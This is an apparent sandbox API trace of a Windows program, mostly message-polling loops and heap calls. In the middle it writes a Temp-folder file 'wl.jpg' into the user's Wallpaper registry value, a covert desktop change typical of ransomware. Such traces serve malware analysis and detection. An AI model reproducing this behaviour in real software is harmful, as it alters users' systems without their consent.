lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.038] Sleep (dwMilliseconds=0xa) [0318.053] timeGetTime () returned 0x4f5e1 [0318.053] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.053] Sleep (dwMilliseconds=0xa) [0318.069] timeGetTime () returned 0x4f5f1 [0318.069] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.069] Sleep (dwMilliseconds=0xa) [0318.089] timeGetTime () returned 0x4f600 [0318.089] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.089] Sleep (dwMilliseconds=0xa) [0318.100] timeGetTime () returned 0x4f610 [0318.100] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.100] Sleep (dwMilliseconds=0xa) [0318.116] timeGetTime () returned 0x4f61f [0318.116] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.116] Sleep (dwMilliseconds=0xa) [0318.131] timeGetTime () returned 0x4f62f [0318.131] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.131] Sleep (dwMilliseconds=0xa) [0318.147] timeGetTime () returned 0x4f63f [0318.147] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.147] Sleep (dwMilliseconds=0xa) [0318.162] timeGetTime () returned 0x4f64e [0318.162] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.162] Sleep (dwMilliseconds=0xa) [0318.178] timeGetTime () returned 0x4f65e [0318.178] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.178] Sleep (dwMilliseconds=0xa) [0318.193] timeGetTime () returned 0x4f66d [0318.194] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.194] Sleep (dwMilliseconds=0xa) [0318.209] timeGetTime () returned 0x4f67d [0318.209] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.209] Sleep (dwMilliseconds=0xa) [0318.225] timeGetTime () returned 0x4f68d [0318.225] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.225] Sleep (dwMilliseconds=0xa) [0318.240] timeGetTime () returned 0x4f69c [0318.240] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.240] Sleep (dwMilliseconds=0xa) [0318.256] timeGetTime () returned 0x4f6ac [0318.256] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.256] Sleep (dwMilliseconds=0xa) [0318.272] timeGetTime () returned 0x4f6bb [0318.272] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0318.272] Sleep (dwMilliseconds=0xa) [0318.287] timeGetTime () returned 0x4f6cb [0318.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0318.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0318.287] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0318.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0318.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0318.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0318.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0318.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0318.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0318.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0318.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0318.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0318.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0318.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0318.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0318.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0318.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0318.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0318.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0318.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0318.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0318.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0318.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0318.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0318.289] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0318.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0318.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0318.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5f8 [0318.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0318.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0318.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0318.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0318.290] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0318.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0318.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0318.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0318.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0318.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0318.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0318.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0318.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0318.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0318.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0318.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0318.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0318.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0318.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0318.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0318.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0318.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0318.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0318.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0318.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0318.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0318.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0318.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0318.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0318.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0318.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0318.291] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0318.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0318.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0318.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0318.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0318.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x30) returned 0x24b35e0 [0318.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0318.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0318.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0318.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0318.292] CharUpperBuffW (in: lpsz="HKCU", cchLength=0x4 | out: lpsz="HKCU") returned 0x4 [0318.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0318.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0318.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0318.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0318.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0318.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0318.293] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Control Panel\\Desktop", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0x20006, lpSecurityAttributes=0x0, phkResult=0x8bf858, lpdwDisposition=0x8bf874 | out: phkResult=0x8bf858*=0x294, lpdwDisposition=0x8bf874*=0x2) returned 0x0 [0318.293] RegSetValueExW (in: hKey=0x294, lpValueName="Wallpaper", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg", cbData=0x58 | out: lpData="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\wl.jpg") returned 0x0 [0318.293] RegCloseKey (hKey=0x294) returned 0x0 [0318.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b35e0 | out: hHeap=0x25c0000) returned 1 [0318.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0318.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0318.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0318.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0318.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0318.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0318.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0318.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0318.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0318.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0318.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0318.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0318.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0318.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0318.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0318.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0318.294] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0318.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0318.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0318.295] CharUpperBuffW (in: lpsz="A4200F01243", cchLength=0xb | out: lpsz="A4200F01243") returned 0xb [0318.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0318.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0318.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0318.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1438 [0318.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0318.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0318.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0318.295] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0318.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2058 [0318.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0318.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0318.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa910 [0318.295] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0318.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0318.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0318.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0318.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0318.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0318.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0318.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0318.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa910 [0318.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0318.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0318.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0318.296] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0318.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0318.296] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0318.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0318.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0318.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1758 [0318.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0318.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0318.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0318.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0318.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0318.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0318.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0318.297] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0318.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0318.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0318.297] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0318.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0318.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0318.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0318.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0318.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0318.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0318.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0318.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0318.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa5b0 [0318.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1898 [0318.298] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0318.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0318.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0318.298] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0318.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0318.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0318.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0318.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0318.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0318.299] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0318.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0318.299] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0318.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0318.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0318.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0318.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0318.299] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0318.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0318.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0318.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0318.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0318.300] CharUpperBuffW (in: lpsz="SSA4200F01243", cchLength=0xd | out: lpsz="SSA4200F01243") returned 0xd [0318.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0318.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0318.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0318.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0318.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0318.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0318.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0318.300] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0318.300] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0318.300] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0318.301] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0318.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0318.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0318.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0318.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d28 [0318.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0318.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0318.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0318.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0318.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0318.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1198 [0318.301] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0318.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0318.301] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 